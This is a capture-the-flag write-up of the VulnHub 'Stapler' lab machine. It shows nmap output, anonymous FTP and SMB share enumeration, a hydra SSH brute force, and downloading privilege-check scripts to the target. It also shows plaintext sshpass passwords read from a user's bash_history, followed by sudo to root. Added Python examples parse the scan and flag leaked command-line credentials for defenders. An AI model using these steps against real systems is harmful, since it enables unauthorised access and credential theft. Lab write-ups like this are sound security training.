Stapler is also a vulnerable machine which can be found on VulnHub: https://www.vulnhub.com/entry/stapler-1,150/

To start off the machine I had to use nmap again, since netdiscover didn't find any IP addresses. There is probably something wrong with netdiscover on my Kali machine.

The nmap results are quite large; let's have a look. We got ports 20, 21, 22, 53, 80, 123, 137, 138, 139, 666, 3306 and 12380:

root@pentest:~# nmap -sV -sC -p- 192.168.229.133                                                                                                    
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 15:38 CET                                                                                     
Nmap scan report for 192.168.229.133                                                                                                                
Host is up (0.00020s latency).                                                                                                                      
Not shown: 65523 filtered ports                                                                                                                     
PORT      STATE  SERVICE     VERSION                                                                                                                
20/tcp    closed ftp-data                                                                                                                           
21/tcp    open   ftp         vsftpd 2.0.8 or later                                                                                                  
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                                                              
|_Can't get directory listing: PASV failed: 550 Permission denied.                                                                                  
| ftp-syst:                                                                                                                                         
|   STAT:                                                                                                                                           
| FTP server status:                                                                                                                                
|      Connected to 192.168.229.129                                                                                                                 
|      Logged in as ftp                                                                                                                             
|      TYPE: ASCII                                                                                                                                  
|      No session bandwidth limit                                                                                                                   
|      Session timeout in seconds is 300                                                                                                            
|      Control connection is plain text                                                                                                             
|      Data connections will be plain text                                                                                                          
|      At session startup, client count was 1                                                                                                       
|      vsFTPd 3.0.3 - secure, fast, stable                                                                                                          
|_End of status                                                                                                                                     
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)                                                                    
| ssh-hostkey:                                                                                                                                      
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)                                                                                      
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)                                                                                     
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|   NSID: kbwzcnsnl22 (6b62777a636e736e6c3232)
|   id.server: kbwzcnsnl22
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: SupportsTransactions, SupportsCompression, InteractiveClient, Support41Auth, LongColumnFlag, ConnectWithDatabase, LongPassword, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, FoundRows, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: cWl<YYnF"r\x03K>l!":X\x1D}
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
--snip--
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 0s, median: 59m59s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2020-01-17T15:39:59+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-17T15:39:59
|_  start_date: N/A
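
To turn a scan like this into a defender's to-do list, here is an added Python example (not part of the original write-up) that parses nmap's normal output and flags the exposures visible above: anonymous FTP, a database listening on the network, and SMB guest access with message signing disabled. The parser, the triage rules and the trimmed SAMPLE_SCAN are my own construction; the sample reuses lines from the scan above purely as test input.

```python
import re

# Constructed excerpt modelled on the nmap output above (trimmed).  The lines
# are copied from the scan, but this is sample input for the parser, not a
# new scan.
SAMPLE_SCAN = """\
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tim, we need to-do better next year for Initech

Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# "21/tcp    open   ftp         vsftpd 2.0.8 or later" -> port, proto, state,
# service and an optional free-text version column.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script lines start with "|" or "|_" followed by optional indentation.
NSE_RE = re.compile(r"^\|_?\s*(.*)$")


def parse_nmap(text):
    """Parse nmap 'normal' output into a list of port records plus the
    host-level script lines.  Each port record keeps the NSE lines nmap
    prints beneath it, so findings can be tied to a port."""
    ports, host_lines = [], []
    current, in_host = None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results"):
            in_host, current = True, None
            continue
        m = PORT_RE.match(line)
        if m and not in_host:
            current = {
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5) or "", "nse": [],
            }
            ports.append(current)
            continue
        m = NSE_RE.match(line)
        if m:
            if in_host:
                host_lines.append(m.group(1))
            elif current is not None:
                current["nse"].append(m.group(1))
    return ports, host_lines


def triage(text):
    """Flag the exposures an administrator would fix first.  Returns a list
    of (port_or_None, description); None marks a host-level finding."""
    ports, host_lines = parse_nmap(text)
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        nse = " ".join(p["nse"])
        if p["service"] == "ftp" and "Anonymous FTP login allowed" in nse:
            findings.append((p["port"], "anonymous FTP login enabled"))
        if p["service"] == "mysql":
            findings.append((p["port"], "MySQL reachable over the network"))
    for line in host_lines:
        if line.startswith("account_used: guest"):
            findings.append((None, "SMB accepts guest (null) sessions"))
        if line.startswith("message_signing: disabled"):
            findings.append((None, "SMB message signing disabled"))
    return findings


if __name__ == "__main__":
    for port, desc in triage(SAMPLE_SCAN):
        print(f"{port if port else 'host':>5}  {desc}")
```

The rules are deliberately few; the point is that the NSE lines nmap already prints (ftp-anon, smb-security-mode) carry the verdict, and a parser that keeps them attached to their port is all that is needed to report them.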

So let's have a look at the web pages on port 80 and port 12380 first.

Both seem empty, so let's run dirb on both ports and see what we can find.

Nothing interesting in those files. Let's run nikto and see what we can find. We ran it against both ports, but let's have a look at port 80 first. The bashrc file and the profile file are what we already found; nothing too interesting in there.

In the scan on port 12380 we found some more interesting stuff:

I can't seem to open robots.txt since it redirects me instantly; same for phpmyadmin. This sucks. Let's look at the other services.

Going back to our nmap results, we can see that port 21 is open and allows anonymous FTP. Let's have a look by connecting to it, then supplying the user anonymous and an empty password. We are in, and there is a file called note.

Let's use get note to transfer the file to our VM and cat the file.

Nothing of too much interest, but we have already found three names: Elly, John and Harry. It might be worth writing these down in a file for possible brute-forcing later. Let's write them to a file named usernames.txt.

After looking back at the nmap results I figured that I should probably do some SMB enumeration. A guide that helped me with this can be found at https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/. After going through and using most of the commands, this is the interesting information I could find:

root@pentest:~# nmblookup -A 192.168.229.133                                                                                                             
Looking up status of 192.168.229.133                                                                                                                     
        RED             <00> -         H <ACTIVE> 
        RED             <03> -         H <ACTIVE> 
        RED             <20> -         H <ACTIVE> 
        ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE> 
        WORKGROUP       <00> - <GROUP> H <ACTIVE> 
        WORKGROUP       <1d> -         H <ACTIVE> 
        WORKGROUP       <1e> - <GROUP> H <ACTIVE> 

        MAC Address = 00-00-00-00-00-00

root@pentest:~# nbtscan 192.168.229.133
Doing NBT name scan for addresses from 192.168.229.133
IP address       NetBIOS Name     Server    User             MAC address       
------------------------------------------------------------------------------
192.168.229.133  RED              <server>  RED              00:00:00:00:00:00

root@pentest:~# smbclient -L 192.168.229.133
Enter WORKGROUP\root's password: 
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

root@pentest:~# smbclient //192.168.229.133/kathy
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 18:52:52 2016
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 17:02:27 2016
  backup                              D        0  Sun Jun  5 17:04:14 2016

Well, interesting. Let's try to get these files and have a look at them. I used the get command to get the files.

smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 17:02:27 2016
  ..                                  D        0  Fri Jun  3 18:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 17:02:27 2016

                19478204 blocks of size 1024. 16394572 blocks available
smb: \kathy_stuff\> get to-do-list.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \kathy_stuff\to-do-list.txt
smb: \kathy_stuff\> cd ../backup
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 17:04:14 2016
  ..                                  D        0  Fri Jun  3 18:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 17:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 19:14:46 2015

                19478204 blocks of size 1024. 16394572 blocks available
smb: \backup\> get vsftpd.conf
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (342.4 KiloBytes/sec) (average 342.4 KiloBytes/sec)
smb: \backup\> get wordpress-4.tar.gz
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (53683.4 KiloBytes/sec) (average 46813.8 KiloBytes/sec)

Before looking at these files: we found two more names in the SMB part, Fred and Kathy (see screenshot below). Let's add these to our usernames.txt.

The todo-list.txt says: I'm making sure to backup anything important for Initech, Kathy. Interesting... So the backup file wordpress-4.tar.gz probably contains some important files. But I couldn't find anything too interesting in it.

With enum4linux we found some more users, plus the information we had found before.

S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

By using the following command we keep just the users, drop the rest of the info and append them to our usernames.txt:

root@pentest:~# cat users.txt | cut -d '\' -f2 | cut -d ' ' -f1 >> usernames.txt
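
The cut pipeline has one quirk worth knowing: cut prints a line unchanged when the delimiter is absent, so any banner or status line enum4linux emits (which has no backslash) ends up in usernames.txt as junk such as "[+]". As an added example, not from the original post, here is a Python version that only accepts well-formed S-1-22-1 lines and collapses duplicates, next to a reimplementation of the shell pipeline so the difference is visible. The sample text and the function names are constructed for this example; the only fact relied on is that S-1-22-1 is Samba's Unix Users authority, whose trailing RID is the Unix uid (which is why peter is 1000 both here and in the LinEnum output further down).

```python
import re

# Constructed sample in the shape of the enum4linux listing above.  It adds a
# banner line with no backslash and a duplicated entry, which are exactly
# the lines the bare cut pipeline passes through or repeats.
SAMPLE_ENUM4LINUX = """\
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\\peter (Local User)
S-1-22-1-1001 Unix User\\RNunemaker (Local User)
S-1-22-1-1001 Unix User\\RNunemaker (Local User)
S-1-22-1-1028 Unix User\\www (Local User)
S-1-22-1-1029 Unix User\\elly (Local User)
"""

# S-1-22-1 is Samba's "Unix Users" authority; the trailing RID is the uid.
LOCAL_USER_RE = re.compile(
    r"^S-1-22-1-(?P<uid>\d+)\s+Unix User\\(?P<name>[^\s(]+)\s+\(Local User\)$"
)


def extract_local_users(text):
    """Return an ordered {username: uid} dict from enum4linux output.
    Lines that are not 'Unix User' SID entries are skipped instead of
    being passed through, and duplicates collapse to one entry."""
    users = {}
    for line in text.splitlines():
        m = LOCAL_USER_RE.match(line.strip())
        if m:
            users.setdefault(m.group("name"), int(m.group("uid")))
    return users


def cut_pipeline(text):
    """Reproduce `cut -d '\\' -f2 | cut -d ' ' -f1` line by line to show what
    the shell version emits for a line that has no backslash."""
    out = []
    for line in text.splitlines():
        # GNU cut prints the whole line when the delimiter does not occur.
        field = line.split("\\")[1] if "\\" in line else line
        out.append(field.split(" ")[0])
    return out


if __name__ == "__main__":
    print("parsed:", extract_local_users(SAMPLE_ENUM4LINUX))
    print("cut   :", cut_pipeline(SAMPLE_ENUM4LINUX))
```

On the defender's side this is the same list an administrator should review after seeing account_used: guest in the scan: every name here was handed out over an unauthenticated SMB session.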

Since I couldn't find anything else interesting, let's try to brute-force the SSH service with hydra, and we found something.

So let's SSH into the machine with the user SHayslett and password SHayslett. Successful, we are in the machine. But we aren't root yet!

Like on the previous machine, I normally do these steps manually, but I really want to use a script for once to see what it can find easily. Let's use the unix-privchecker script we put into our /var/www/html folder so we can download it on the machine. We have to start apache2 again, since we restarted Kali after our previous challenge. This can be done with service apache2 start. We should go into the /tmp directory, wget the file and make it executable.

Well, unix-priv-esc didn't work, but we could clone LinEnum and run it. Let's go through the output; this is what I found interesting:

[-] It looks like we have some admin users:                                                                                                              
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)                                                                                                
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

[-] Accounts that have recently used sudo:                                                                                                               
/home/peter/.sudo_as_admin_successful

[-] Location and contents (if accessible) of .bash_history file(s):
--snip--
/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
--snip--
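
From the defender's side, the finding above is a plaintext credential sitting in a shell history file, which is exactly what a host audit should be looking for. The following Python example is added here and is not part of the original post: it scans history text for command patterns that carry a password or token on the command line (sshpass -p, mysql -p..., curl -u user:pass, exported *_TOKEN/*_PASSWORD variables) and reports the hits with the secret masked. The sample history and its placeholder secrets are constructed; the pattern set is an assumption and is not exhaustive.

```python
import re

# Constructed sample history in the shape of the LinEnum excerpt above.
# The secrets are placeholders, not values from any real system.
SAMPLE_HISTORY = """\
id
whoami
sshpass -p PLACEHOLDER_PW1 ssh someuser@localhost
apt-get install sshpass
sshpass -p PLACEHOLDER_PW2 otheruser@localhost
mysql -u root -pPLACEHOLDER_PW3 wordpress
curl -u admin:PLACEHOLDER_PW4 http://localhost/admin
export API_TOKEN=PLACEHOLDER_TOKEN
ls -lah
"""

# Each pattern captures the secret in group 1 so it can be masked.
# The mysql rule only fires on "-pSECRET"; a bare "-p" (interactive
# prompt) is the safe form and is left alone.
PATTERNS = [
    ("sshpass -p", re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("mysql -p", re.compile(r"\bmysql\b.*?\s-p(\S+)")),
    ("curl -u", re.compile(r"\bcurl\b.*?\s-u\s*[^:\s]+:(\S+)")),
    ("exported secret",
     re.compile(r"\bexport\s+\w*(?:PASS|PASSWORD|TOKEN|SECRET|KEY)\w*=(\S+)", re.I)),
]


def mask(secret):
    """Keep the first two characters so the hit is recognisable in a report
    without reproducing the credential."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def find_leaked_credentials(history_text):
    """Return (line_no, pattern_name, masked_command) for each history line
    that carries a credential on the command line."""
    hits = []
    for n, line in enumerate(history_text.splitlines(), 1):
        for name, rx in PATTERNS:
            m = rx.search(line)
            if m:
                secret = m.group(1)
                hits.append((n, name, line.replace(secret, mask(secret))))
                break  # one report per line is enough
    return hits


if __name__ == "__main__":
    for n, name, cmd in find_leaked_credentials(SAMPLE_HISTORY):
        print(f"line {n:>3}  [{name}]  {cmd}")
```

In practice this would be run over every /home/*/.bash_history and /root/.bash_history the audit can read, and a hit is a cue to rotate the credential, not just to delete the line: the LinEnum output above shows that an attacker who gets a foothold will read exactly the same files.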

So it seems like we got the password of peter, and he might be an admin user. Let's SSH into his account and see.

So I tried to change the user to root with the sudo su command, and it seems like we are root. Let's go to the home directory and cat the flag.txt. Challenge done 🙂 Let's read some walk-throughs to find some other ways to root/access the box. I found that https://ivanitlearning.wordpress.com/2019/11/22/vulnhub-stapler-walkthrough-pt-2/ is good to read after completing the box.

Some learning points after reading other walk-throughs:

  • Check whether your browser is going through http or https. You could get to the https://192.168.229.133:12380/blogblog/ URL with https, but not with http.
